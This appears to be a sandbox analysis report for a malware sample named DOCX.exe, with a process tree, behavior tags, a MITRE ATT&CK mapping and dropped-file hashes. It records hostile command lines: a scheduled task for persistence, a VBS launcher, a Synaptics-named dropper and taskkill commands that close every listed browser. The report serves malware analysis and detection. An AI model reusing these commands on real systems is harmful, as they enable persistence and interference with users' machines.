C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:84⤵PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:14⤵PID:180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:14⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:14⤵PID:1516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:14⤵PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5212 /prefetch:84⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:14⤵PID:3824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1000
-
-
-
C:\Windows\system32\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:4844
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOCX.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\system32\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\Startup\DOCX.exe"C:\Users\Admin\AppData\Local\Temp\Startup\DOCX.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\._cache_DOCX.exe"C:\Users\Admin\AppData\Local\Temp\._cache_DOCX.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 15⤵
- System Location Discovery: System Language Discovery
PID:3840 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TGWEKK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 16⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:628
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\TGWEKK.vbs5⤵
- System Location Discovery: System Language Discovery
PID:5080
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1748
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3464
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3972
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4956
-
C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exeC:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2184
-
C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exeC:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5012
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD537f660dd4b6ddf23bc37f5c823d1c33a
SHA11c35538aa307a3e09d15519df6ace99674ae428b
SHA2564e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d
-
Filesize
152B
MD5d7cb450b1315c63b1d5d89d98ba22da5
SHA1694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA25638355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8
-
Filesize
6KB
MD595117a328e791cdb5c2f2c97364cd3f5
SHA15908ab1de1eb748d71caf4c912aedbe2553e3139
SHA25665d9eaa385aa0cc1ed9aeafa9eb586eed0b8fa671eaf11b597ccd26c2ebfbe81
SHA51273e06117b9d6dac3f739a01966676fdae3a1132ddb2afda7a472a35aa2a660c46c8a51e3c8787eef482cf9eb86fdca577ede1dd8e13b708d038fb980b76c070e
-
Filesize
5KB
MD50bfa96edb9609e4e262032d3e1138ea6
SHA15a7e2025a65893fdcbc322acc05e5e3ccdf8a736
SHA2569015dff7ba508c8448edf756fc6316da67372a776ff070d20c6b29f51404d382
SHA51260774dab4d71da152874c089b99e8c9ac3a93fb9c187d79ba3b59fcd488c829503cf8a8dcba9b6c771530285713c33659dbedb4241619ad115f3e8c15a78fe4d
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5b412d399bb03a9b27bfb1deada749704
SHA13be82d44e4a792728217f15aa968e1da45018317
SHA2569c02f1780ab681cb21b5dc55886e63df25137d6ec1ea145ba54b0e347136dc21
SHA51244f1bf704e462e3e9ad87d2fd7ee555a1d4ccab1ffd4dff495dd941e04ced495f54b946b9921baa7d0cc70a1b9a51b2782a4ada4a386895ba61dd0d39fac8580
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize4KB
MD5339d14f240c89d738525777735f85b45
SHA190ac0493d2d2cb33013610ffb7fc5959877f730b
SHA2564206ce3a26bd4ee4f3d7e4eca3708bdf295adf9ae10b4687090f07e7de492425
SHA5122f76059a18382466249ad888e532131ad216544fa91974560d4d30974cfe5ad51234833297b84c15ea87e764350ccede67b42c4aeb88c77d2341a82922c27a40
-
Filesize
944B
MD598baf5117c4fcec1692067d200c58ab3
SHA15b33a57b72141e7508b615e17fb621612cb8e390
SHA25630bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d
-
Filesize
944B
MD55cfe303e798d1cc6c1dab341e7265c15
SHA1cd2834e05191a24e28a100f3f8114d5a7708dc7c
SHA256c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab
SHA512ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
1KB
MD5c4ed6cef32d06ce46eafd38641bfd407
SHA14508ec1e74e1beaf84c42acdeae4e11131e5a6a9
SHA256174e5ffd55ffde5c6edd25b8a59dc0de8e7183dc7f671f49681cf7c13ff21d9e
SHA512077df08a950f5af878f4879eae520fa0ead4ce92f7a9314018d2f40a915cc69cf93e412ca6416a31362b8b79fccea4613591e2889cfcfa472ff0991bb5e3506d
-
Filesize
944B
MD5fe32430ab97c0308ed326ed9a7dd94d1
SHA17f10913ddfec7fd269da79de83156cd07623410a
SHA25674ce5bee24a7c0a66983eea9391cb607f1d15d2c30a633a259b9517804ebe7a0
SHA512a38c58cca3c40cea8995f3fa50d32035366d1d990ce264557af1a3cad2eb39023433f9ac362f2ae67d25ce1a8bd76d1cb2444d3a2fc1d24df465490bbcb6c839
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
917KB
MD514ae5a17618d08f48a350e9496c2c959
SHA1678bea5c7d0bb18d0dcab46c646536de5a51d24f
SHA25636dac4b76a8c3ea977d141ee3df142383efa9b0bc24d19da949d106d0b602207
SHA512fca819082bd9479a7d8bcf27203f4a832e6148dc44655463a28490ca3c3f39f5d1d5ae57f6c235a03fca136b6e315338e776040d1ad18eb200d3953e73d464c2
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
844B
MD587c2fe360d7d70c430a6a914e00eb4a4
SHA13f014ac92386d9e5f5458c23837cd108e2440c8d
SHA25655dbc17961004caaec6adb4ac282818b533b141e4b8548fc3a88f73c6b8c20f0
SHA512794139f40c2a0d2609a2119cf4752c6b9c0a7279ae5348470c59305394569d2204c1f2c05584947ed475265e6f009a98479353b12f383e5134f3deb97e9ab2ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD5a0177c0a9f2254179b112eecf3c58cc6
SHA103478f572f818c8ffd7f8ebe23632432e82e4461
SHA25655d2bea108eeaabcdf59d449cf15f0efabb59e243d9bd91ff0b0805cd3d133df
SHA5120247f803d5018659899766fe8758c14081b1fe9f414c2afb8f34e78569bf5e9063b746c3adf388b60017367070582e7d8b9422ae94bcef4c8c0d39fa7e4a4470
-
Filesize
1.2MB
MD5f5ab8279f54707922e6ae1f83b93478a
SHA1528cf2ac4df0aeb4ecac7e989b06f7461d24ea3c
SHA256d7c01f4991abc009f182b7dd457da87deca1c3a4db05b25d4f1b058fcc8a8339
SHA5129a0832e381f9407049f33a0ef86e96b924253dd6f7e42c20514a49528bc7bd024767dd4b06c10edf98fe5ae90bd48109fbca1a820dd8428ea22a3f68e9d9dab1